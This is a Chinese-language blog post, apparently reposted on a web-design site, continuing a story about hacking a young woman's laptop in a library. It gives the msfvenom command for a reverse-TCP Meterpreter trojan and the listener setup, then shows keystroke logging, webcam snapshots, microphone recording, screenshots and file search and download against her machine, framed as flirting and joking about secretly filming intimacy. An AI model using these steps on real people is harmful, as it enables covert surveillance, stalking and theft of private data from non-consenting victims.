雞西網站建設制作優化設計[SEO]
本頁定位
在線咨詢

圖書館撩妹記下

Yeshisan1年前 (2018-09-16)2005A+A-

圖書館撩妹記》是我在17年初寫的一篇記錄,群里的老哥對我這篇舊文很感興趣,其實用到的技術都是一些較為基礎性的技巧進行結合,并不復雜也不是很高深。由于法律原因某些細節被我刪除掉了,但是有老哥問我后面,那我這里就再做一點補充。

Meterpreter簡介

Meterpreter是Metasploit框架中的一個擴展模塊,也是后滲透中必不可少的一個工具。在Metasploit框架中加載payload對目標機器進行攻擊后,當攻擊載荷在目標機器觸發后會建立一個控制目標機的shell交互界面的通道,而這個通道就是Meterpreter。
meterpreter shell作為滲透模塊有很多有用的功能,比如添加一個用戶、隱藏一些東西、打開shell、得到用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、得到遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。(百度copy的)

Meterpreter使用

在使用之前,需要先用msfconsole生成一個exe的木馬文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f exe > ./yeshisan.exe
  • msfvenom 取代了之前的msfpayload和msfencode
  • p參數指定加載的payload,這里用到的是reverse_tcp反連模塊
  • LHOST:設置反連的IP地址,也就是本機
  • LPORT: 設置反連的端口,默認是4444端口
  • f參數:輸出為exe木馬,可指定輸出木馬,默認生成在root目錄下

當生成的木馬在目標機器上運行時,木馬會向預設的IP地址和端口發起一個TCP的連接,我們在本地設置監聽木馬反向連接的端口,當監聽到有請求進來后,會自動建立一個meterpreter的會話。

這里我們還需要在本機上設置監聽4444端口,通過msfconsole啟動Metasploit。

[email protected]:~# msfconsole

載入監聽模塊

msf > use exploit/multi/handler

載入payload,載荷與剛才生成木馬的一致

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

查看需要設置的選項

msf exploit(handler) > show options


這里需要設置的是LHOST和LPORT,監聽的IP地址和端口,由于生成木馬的時候使用的是默認端口,所以這里只需要設置監聽的IP地址,然后run,開啟監聽。

msf exploit(handler) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(handler) > run

在目標機上運行木馬之后,msf監聽到請求并建立會話

如果你不是很熟悉Meterpreter,可以通過help命令獲取幫助

meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components

Stdapi: Webcam Commands
=======================

Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

Meterpreter常用命令

help:查看幫助信息
background:將會話放置后臺,退回Msf
download:從目標主機上下載文件
upload:上傳文件到目標機
execute:在入侵主機上執行命令
shell:在入侵主機上(僅是Windows主機)運行Windows shell命令
session -i:切換會話

上文的一些補充

既然是接上文的一些補充,那么肯定不會全部列舉,下面說一說幾個在圖書館一文中后續用到的命令。

鍵盤記錄:keyscan_start

我們可以通過Meterpreter開啟鍵盤記錄,來看一看妹子在寫啥,打開記事本隨便寫點東西。

meterpreter > keyscan_start
Starting the keystroke sniffer...

通過下載鍵盤記錄進行查詢,可以看到我寫的是meizi i love you
下載鍵盤記錄:keyscan_dump

meterpreter > keyscan_dump
Dumping captured keystrokes...
meizi l <Back> i love you

停止鍵盤記錄:keyscan_stop

給妹子來一手驚喜,通過筆記本的攝像頭截圖一張照片

列出攝像頭列表:webcam_list
從攝像頭截取一張快照:webcam_snap
麥克風錄音:record_mic

這個錄音功能就不談了,如果是手機的話你懂的,懂我意思吧。
配合攝像頭來個為愛鼓掌現場直播了解下,當然這功能我基本上沒用過,純屬開玩笑。

如果想看妹子現在在干什么,在命令行敲screenshot,截取到的屏幕圖片會輸出到root目錄下。

meterpreter > screenshot
Screenshot saved to: /root/ThWrdjpy.jpeg
meterpreter >


當然別忘了我最初的目標就是為了妹子電腦里的文件,看看有沒有聯系方式。想要搜索目標電腦上的文件可以用search命令,search -h查看用法。

search -h
Usage: search [-d dir] [-r recurse] -f pattern
Search for files.

OPTIONS:

-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> The file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)

來個簡單的例子,比如我要搜索所有的txt文件

通過文件名來看是不是想要的文件,找到可疑的文件后,可通過download命令進行下載,這個只有一個r參數加上文件所在的路徑。
meterpreter > download -r c:/1.txt
[*] downloading: c:/1.txt -> 1.txt
[*] downloaded : c:/1.txt -> 1.txt

最后我想給妹子一個驚喜,還是老套路劫持開啟apache

[email protected]:~# service apache2 start
[ ok ] Starting web server: apache2.
[email protected]:~#

 

最后

你以為這樣就結束了????

這符合我一慣的作風嗎???

后面肯定還有劇情,關于進入妹子學校,利用學校的xx進行表白。

但是

我懶得寫,全劇終。

全部評論: 1
  • letian 贊(0)  沙發

    零零落落零零落落

登錄沒有賬號 切換注冊

忘記密碼 ?

注冊已有賬號 切換登錄

15选5走势图开奖